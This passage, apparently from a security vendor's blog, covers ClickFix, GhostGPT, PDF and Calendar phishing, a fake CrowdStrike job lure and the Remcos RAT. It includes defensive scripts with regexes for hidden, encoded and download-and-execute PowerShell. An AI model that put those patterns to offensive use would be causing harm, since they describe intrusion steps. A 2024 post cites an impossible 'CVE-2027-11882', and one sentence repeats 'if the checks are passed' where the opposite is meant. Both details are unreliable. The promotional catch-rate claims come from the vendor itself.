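{"UtcTime": "2025-01-26 09:33:57", "User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
{"UtcTime": "2025-01-26 09:40:05", "User": "CORP\\dave", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh.exe -NoProfile -enc QQBCAEMARABFAEYARwBIAEkASgA="}
""".strip()

SHELLS = {"powershell.exe", "pwsh.exe"}

# Heuristic indicators (assumptions for this example, not a complete rule set).
# An interactive PowerShell window opened by a user normally has none of them.
INDICATORS = {
    "hidden_window": re.compile(r"\s-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(
        r"\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
        r"downloadstring|downloadfile)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_run_dialog_powershell(lines):
    """Flag PowerShell started directly by explorer.exe with risky arguments.

    explorer.exe is the parent of anything launched from the Run dialog, so
    this pairing plus a hidden window, an encoded command, or a download and
    execute pattern is worth an analyst's attention.
    """
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the scan
        if basename(event.get("ParentImage", "")) != "explorer.exe":
            continue
        if basename(event.get("Image", "")) not in SHELLS:
            continue
        command = event.get("CommandLine", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if hits:
            findings.append({
                "time": event.get("UtcTime"),
                "user": event.get("User"),
                "indicators": hits,
                "command": command,
            })
    return findings


if __name__ == "__main__":
    for finding in find_run_dialog_powershell(SAMPLE_LOG.splitlines()):
        print(finding["time"], finding["user"], finding["indicators"])
```

The rule deliberately ignores PowerShell started by management agents or services, which need their own baselines; it only covers the user-driven path that ClickFix relies on.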
To defend against ClickFix attacks, businesses need to implement multiple mitigations to prevent these attacks from succeeding, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should be conducted to improve understanding of the phishing and social engineering techniques used by threat actors, including specific training content to teach employees how to identify and avoid ClickFix attacks. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated ClickFix attacks.
An advanced spam filter is essential for blocking malicious emails. TitanHQ’s SpamTitan suite of solutions includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud based anti spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify the threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate, and a 99.999% spam catch rate.
Web filtering solutions should be used to protect against the web-based component of ClickFix attacks since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled webpages used in ClickFix attacks. WebTitan can also prevent downloads of certain file extensions from the Internet and can be used to control the categories of websites that employees can visit.
With regular security awareness training, email security, and web security delivered through SafeTitan, SpamTitan, and WebTitan, businesses will be well protected from ClickFix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Jan 25, 2025 | Phishing & Email Spam, Security Awareness, Spam Software |
A new AI chatbot has been released specifically for use by cybercriminals that has been developed to assist with malware development, phishing campaigns, and business email compromise attacks. The new chatbot is called GhostGPT, and follows the release of WormGPT, WolfGPT, and EscapeGPT which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots which will not generate responses to queries related to criminality. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM), ensuring queries are not subject to censorship. The tool is offered on Telegram and for a fee, the tool can be immediately used.
There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. These tools can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails. The researchers found their AI-generated emails had a 54% click rate.
These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.
Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.
SpamTitan, TitanHQ’s spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats from their behavior rather than their signature. In the Q4, 2024, tests by VirusBulletin, the engine that powers SpamTitan and TitanHQ’s Microsoft 365 anti-phishing solution – PhishTitan – ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.
The high percentage of individuals fooled by AI-generated phishing emails highlights the importance of conducting regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and highlight the individuals who are failing to apply their training to the emails they receive on a daily basis. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.
Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TitanHQ’s solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 20, 2025 | Phishing & Email Spam |
New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.
Amazon Prime Phishing Campaign
The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.
Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.
If the link is clicked, the user is directed to a URL (a duckdns.org subdomain) that displays an exact copy of the Amazon sign-in page. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.
US Postal Service Phishing Campaign
A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.
Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.
Improve Your Phishing Defenses
These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.
Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.
TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.
TitanHQ’s cloud-based anti-spam service – SpamTitan is an advanced email security solution for blocking the full range of email threats including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved 1st spot for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.
For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam |
Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.
These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, job applications, and completing homework, translating from one language to another, creating summaries of text to pull out the key points, and writing and debugging code to name just a few applications.
When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.
Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.
Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack these easily identified red flags.
While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.
A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.
For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.
The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.
What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.
AI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used for defensive purposes and can identify the phishing content that humans struggle to identify. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.
SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams will be able to sleep easily.
For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam, Security Awareness |
A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding and offering an interview with the company.
The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team; however, this year, the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which triggers the download of a fake application for scheduling the interview. Recipients are given the option of downloading a Windows or MacOS version of the application; however, the downloaded file is an XMRig installer. When executed, checks are performed of the environment to determine if a debugger is attached to the process, the device is checked to ensure it has two cores and is suitable for cryptocurrency mining, and checks are performed to identify virtualization and running processes to prevent execution in a sandbox environment. If the checks are passed, a copy of XMRig is downloaded from GitHub and executed. If the checks are passed, the user is presented with an error message, advising them that the installation has failed, potentially due to a hardware compatibility issue. The user is told to try again by downloading the application on another device, potentially infecting a second device with XMRig.
Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.
The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.
For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.
The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.
by titanadmin | Dec 31, 2024 | Phishing & Email Spam, Spam Software |
Various analyses indicate there has been a significant increase in phishing attacks in 2024, with one study revealing that 94% of organizations experienced at least one phishing attack in 2024, two percentage points higher than the previous year. The majority of those organizations suffered bad consequences as a result of those attacks.
Phishing attacks are not only increasing in volume, they are also increasing in sophistication and AI tools are making phishing attempts much harder to identify. AI tools are being used to slash the amount of time taken to conduct research for spear phishing attacks, including using these tools to create lures that the targeted individuals are likely to respond to. AI tools are being used to create grammatically perfect emails, even matching the writing style of the impersonated company or individual. There has also been an increase in multi-channel attacks, where phishers combine email, text messages, and the telephone in their scams.
In the United States, the Federal Bureau of Investigation’s Internet Crime Complaint Center publishes annual reports on cybercrime complaints, with this year’s report showing almost 300,000 reports of phishing-related cybercrime, not including cyberattacks such as ransomware attacks that started with phishing emails. Across the Atlantic, in the UK it was a similar story, with the Information Commissioner’s Office also reporting an increase in complaints related to phishing.
With the increase in attacks, use of AI tools, and rising data breach costs, it is no surprise that phishing is one of the biggest causes of stress for cybersecurity professionals. With the New Year rapidly approaching, now is the perfect time to ease the stress by enhancing your defenses and strengthening your email security posture, and one of the best ways to do that is with an improved email security solution capable of identifying and blocking even sophisticated threats.
At TitanHQ, we are continuously making improvements to the engine at the heart of our antispam software (SpamTitan) and anti-phishing solution (PhishTitan) to improve detection and usability. The latest release is the most powerful yet with AI and machine learning capabilities and email sandboxing for exceptional malware detection. The engine has been shown to be highly effective in independent tests by the highly respected independent computer security company VirusBulletin.
VirusBulletin put the engine that powers the SpamTitan and PhishTitan solutions to the test along with 10 leading email security solutions and awarded it joint first place for overall score in the Q3, 2024 tests, and first place in the Q4, 2024 tests. For the third consecutive quarter, TitanHQ achieved a 100% malware catch rate, and the phishing catch rate increased from 99.99% in Q2 to 100% in Q4, with a Q4 spam catch rate of 99.99% and a 0.00% false positive rate. The strong performance has earned TitanHQ its third consecutive VBSpam+ award. SpamTitan and PhishTitan are very competitively priced and it is easy to switch from alternative email security solutions. Given the amazing catch rates, ease of use, and competitive pricing, it should come as no surprise that record numbers of companies are making the switch to TitanHQ to improve their phishing defenses.
Technical defenses are important for blocking threats, but it is also important that your workforce is trained to recognize phishing and other security threats. The workforce needs to be provided with regular training sessions to reinforce security best practices and make them aware of the threats they are likely to encounter. Through regular training, you can develop a security culture and ensure that employees will be able to detect, avoid, and report any threats landing in their inboxes.
The easiest way to improve security awareness is with a comprehensive training platform such as SafeTitan. SafeTitan is an easy-to-use training platform with hundreds of training modules covering all aspects of security that is used by businesses to teach security best practices and raise awareness of common and not-so-common threats. Training courses can easily be created for different users, job roles, and threat levels, and the training can be automated to provide hands-off training continuously throughout the year. The platform can be configured to automate the delivery of relevant training in response to security errors, and the phishing simulator can be used to conduct internal campaigns to reinforce training and identify areas where training needs to be improved.
Why not get 2025 off to the perfect start by improving your phishing defenses with TitanHQ? Give the team a call today to discuss these solutions in more detail and take advantage of a free trial of these solutions to see for yourself the difference they make to your phishing defenses.
by titanadmin | Dec 30, 2024 | Phishing & Email Spam |
It used to be relatively easy to spot a phishing attempt. Phishing emails would have poor grammar and be littered with spelling mistakes, with relatively easy-to-identify lures such as too-good-to-be-true offers. The unsolicited emails would be sent from unknown email addresses in huge volumes, as threat actors knew they were good enough to fool enough recipients and make the campaigns worthwhile. Provided employees had a modicum of security awareness training and took time to carefully read emails, the phishing attempts could be easily identified and avoided.
Phishing has been growing in sophistication and while these poorly constructed emails are not exactly a thing of the past, there is now a new breed of phishing emails that are expertly written, contain no errors, and are highly personalized to maximize the probability of getting the desired response. In order to conduct a highly personalized spear phishing campaign, threat actors need to spend a considerable amount of time researching their intended targets. In order to warrant that amount of time, the potential rewards must be high. These campaigns are usually conducted on high-value targets such as C-suite members by well-resourced threat actors, such as state-sponsored hacking groups.
Advances in AI technology have made these highly targeted phishing campaigns much easier to conduct. AI tools greatly reduce the amount of human effort required and that has opened up these targeted campaigns to a much broader range of cybercriminals. AI tools can be used to craft perfect phishing emails that closely mimic the companies and brands they spoof, making identification difficult. AI tools are also being used to analyze online profiles to gather personal information to be included in phishing emails, massively reducing the time required to construct the perfect scam email.
AI tools can also be used to assess online interactions by a particular individual to find out topics the individual is likely to respond to. They can rapidly ingest large amounts of data to craft phishing lures closely mimicking the style of emails written by a particular company or individual, making the spoofing almost impossible for individuals to distinguish from genuine communications. With the tools to gather a wealth of personal information and create flawless emails on appropriate topics, business email compromise scams have become much easier and can be conducted by a broader range of cybercriminals. The consequences of falling for one of these scams can be severe.
To combat these advanced phishing campaigns, businesses need advanced defenses. It is important to ensure that all members of the workforce receive ongoing security awareness training, including the C-suite as they are often the people being targeted in these campaigns. However, given the quality of these phishing attempts, security awareness training and a standard spam filter appliance will not cut it. For many years, spam filters have relied on blacklists of IP addresses and domains that have been previously identified as malicious or have low trust scores, along with antivirus engines for malware detection, and scans of message content for phrases commonly associated with spam and phishing. These spam filters will catch the majority of spam and bulk phishing emails, but will not detect the more sophisticated, AI-generated threats.
Advanced email security solutions are now a necessity. The latest anti-spam software and cloud-based anti-spam services incorporate AI and machine learning-based detection in addition to the standard spam filtering methods, such as the engine at the heart of TitanHQ’s SpamTitan and PhishTitan M365 anti-phishing solutions. In recent independent tests by VirusBulletin, TitanHQ’s SpamTitan Skellig engine scored joint first place for detection in the Q3, 2024 tests and first place in Q4, achieving a 100% phishing detection rate with a 0.00% false positive rate and a 100% malware catch rate. Whether you are a business looking to improve your defenses or a managed service provider looking to provide more advanced security to your clients, give the TitanHQ team a call to find out more about getting the right tools in place to counter these advanced phishing threats.
by titanadmin | Dec 29, 2024 | Phishing & Email Spam, Spam Software |
Detections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new tactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive data.
The Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two main variants delivered using distinct methods. One of the variants is distributed in phishing emails using Microsoft Office open XML attachments that exploit a Microsoft Office memory corruption remote code execution vulnerability (CVE-2027-11882) to execute an embedded script that downloads an intermediate payload that will in turn deliver the Remcos RAT. The vulnerability does not affect newer Office versions, such as Microsoft 365, only older versions prior to Office 2016.
Lures commonly used include fake purchase orders, where the email claims to include purchasing specifications in the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected, and to enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA file, triggering the processes that lead to the installation of the Remcos RAT. When delivered, the Remcos RAT is injected into a legitimate Windows executable (RegAsm.exe).
The second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote server and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the malware is often not detected by security solutions. Once installed, persistence is maintained via registry modifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include payment confirmations, with details included in the attached DOCX file.
The highest number of infections have occurred in the United States and India, and there has been a sharp rise in infections in recent months showing that the campaigns are proving effective. A combination of technical measures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such as this show why it is important to stay on top of patching and ensure that all systems are kept up to date, and to migrate from software that has reached end-of-life to supported software versions. Endpoint security software is important; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.
The primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an ideal choice as it includes reputation checks, SPF, DKIM, & DMARC, machine-learning algorithms to identify anomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern filtering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested email security solutions, with a 100% malware and phishing catch rate.
It is important to keep the workforce up to date on the latest security threats and to teach and reinforce security best practices. The SafeTitan security awareness training platform makes this easy for businesses and MSPs, allowing effective security awareness training programs to be created that are tailored to individuals and user roles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the SafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit from the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect Microsoft 365 environments from the advanced threats that Microsoft fails to block, adds banners to emails from external sources, and helps security teams rapidly mitigate phishing threats.
by titanadmin | Dec 28, 2024 | Phishing & Email Spam |
An ongoing large-scale phishing campaign targets European businesses and attempts to obtain credentials for their Microsoft Azure cloud infrastructure. While businesses in multiple sectors have been attacked, the majority are in the automotive, chemical, and industrial manufacturing sectors. According to an analysis of the campaign by the Unit 42 team, this campaign has targeted at least 20,000 businesses in Europe.
Like many current phishing campaigns targeting companies, the campaign uses DocuSign-themed lures, where the user is asked to review an emailed document, which includes the branding of the company being targeted. If the document is opened, the user is directed via embedded hyperlinks to an online form created using HubSpot’s free online form builder tool. The drag-and-drop form builder allows forms to be created quickly, and in this case, the threat actor has used the free-to-use tool to create a form with a link button to view the document on Microsoft’s secured cloud.
If the button is clicked, the user will be directed to a phishing page that mimics the Office 365 Outlook Web App login page. If credentials are entered in the fake login page – commonly hosted on attacker-controlled .buzz domains – they are captured by the threat actor, who will attempt to log in, and then pivot and move laterally to the cloud. A successful login will see the threat actor add a new device to the victim’s account for persistence.
There are several measures that can be taken by businesses to protect against phishing campaigns such as this, starting with an email spam filter to block the initial contact via email. SpamTitan is an advanced cloud-based anti-spam service for blocking email phishing and malware threats. The solution checks inbound messages against up-to-the-minute lists of blacklisted domains, performs SPF, DKIM, and DMARC checks, malware scans, assessments of message headers and content for phishing indicators, and incorporates AI and machine learning algorithms to identify anomalies in message content. Email sandboxing is used to subject messages to in-depth analysis to identify zero day threats. In recent independent testing by VirusBulletin, SpamTitan achieved first place for overall score out of 11 leading email security solutions, blocking 100% of phishing attempts, 100% of malware, and 99.998% of spam email, with a 0.00% false positive rate.
Security awareness training is vital to teach security best practices and make employees aware of threats, including email threats that abuse legitimate services and tools. TitanHQ’s SafeTitan platform allows businesses to quickly create and automate security awareness training programs, tailored for departments, user groups, and individuals, and reinforce training through phishing simulations. An additional recommended protection is the WebTitan DNS-based web filter, which incorporates URL filtering to prevent users from visiting known malicious websites, incorporating controls to prevent users from downloading malware.
For more information on improving your defenses against phishing, give the TitanHQ team a call today. The full TitanHQ suite of cybersecurity solutions is available on a free trial, with full product support provided throughout the trial.
by titanadmin | Dec 28, 2024 | Phishing & Email Spam |
Companies in multiple sectors are being targeted in an ongoing phishing campaign in which initial contact is made by email using Google Calendar-generated meeting invites. This campaign has proven effective, especially when the user recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these phishing emails identified each week, according to Check Point.
The aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file attachment (.ics), both of which will send the user to either Google Forms or Google Drawings. Next, the user is tricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the user to the scam page, where they will be taken through a fake authentication process that captures personal information, and ultimately payment card information. This campaign could easily be adapted to obtain credentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted credentials.
An attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look exactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the phishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and trusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.
Depending on the user’s settings, these may be automatically added to the user’s calendar. The threat actor can then trigger a second email by canceling the meeting and has been doing so in this campaign. The cancellation email also includes a hyperlink to a malicious website.
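Because these invites pass SPF, DKIM, and DMARC, a filter has to look at the invite itself. The following is an added example, not code from the original post or from Google: it parses an .ics attachment and flags an unknown organizer, links to Google Forms or Google Drawings, and cancellations that carry a link. The sample invite, the contact list, the reason names, and the verdict thresholds are all constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample invite (not from a real campaign). The DESCRIPTION line is
# folded as RFC 5545 allows, which hides the URL from a naive line-by-line scan.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "METHOD:REQUEST\r\n"
    "BEGIN:VEVENT\r\n"
    "ORGANIZER;CN=Accounts Team:mailto:billing@unknown-sender.example\r\n"
    "ATTENDEE;CN=Alice:mailto:alice@corp.example\r\n"
    "SUMMARY:Invoice review\r\n"
    "DESCRIPTION:Confirm before the meeting\\, https://docs.google.com/fo\r\n"
    " rms/d/e/CONSTRUCTED_ID/viewform\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

URL_RE = re.compile(r"https?://[^\s<>\"']+")
TEXT_FIELDS = {"SUMMARY", "DESCRIPTION", "LOCATION", "URL", "X-ALT-DESC"}


def unescape_text(value):
    """Undo iCalendar TEXT escaping (\\n, \\, \\; and \\\\) in a single pass."""
    return re.sub(r"\\(.)",
                  lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def parse_properties(ics_text):
    """Unfold continuation lines, then return (NAME, value) pairs."""
    unfolded = re.sub(r"\r?\n[ \t]", "", ics_text)
    props = []
    for line in unfolded.splitlines():
        head, sep, value = line.partition(":")
        if sep:
            props.append((head.split(";")[0].upper(), unescape_text(value)))
    return props


def is_google_interstitial(url):
    """True for the Google Forms / Google Drawings hops described in the post."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if host == "forms.gle":
        return True
    return host == "docs.google.com" and parts.path.startswith(("/forms", "/drawings"))


def triage_invite(ics_text, known_contacts):
    """Score one invite. known_contacts is a set of lower-case addresses the
    recipient has corresponded with (hypothetical input, e.g. from mail history)."""
    props = parse_properties(ics_text)
    method = next((v.upper() for n, v in props if n == "METHOD"), "")
    organizer = next((v for n, v in props if n == "ORGANIZER"), "")
    organizer = re.sub(r"(?i)^mailto:", "", organizer).strip().lower()
    urls = [u.rstrip(".,)") for n, v in props if n in TEXT_FIELDS
            for u in URL_RE.findall(v)]

    reasons = []
    if organizer not in known_contacts:
        reasons.append("organizer-unknown")
    if any(is_google_interstitial(u) for u in urls):
        reasons.append("google-forms-or-drawings-link")
    if method == "CANCEL" and urls:
        reasons.append("cancellation-with-link")

    # Assumed policy: one signal goes to review, two or more are quarantined.
    if not reasons:
        verdict = "deliver"
    elif len(reasons) == 1:
        verdict = "review"
    else:
        verdict = "quarantine"
    return {"organizer": organizer, "urls": urls,
            "reasons": reasons, "verdict": verdict}


if __name__ == "__main__":
    print(triage_invite(SAMPLE_ICS, {"bob@corp.example"}))
```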
The use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of requests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than 500 million active users of the tool.
There are simple steps to take to block these threats, although the first option will also limit legitimate functionality for genuine invites. To block these attempts, go into Google Calendar settings, and in the event settings switch from “automatically add invitations” to “only show invitations I have responded to”. Also, access Gmail settings and uncheck “automatically add events from Gmail to my calendar”. To avoid disabling the functionality, check the “only known individuals” setting in Google Calendar, which will generate an alert if the user has had no interactions with an individual in the past.
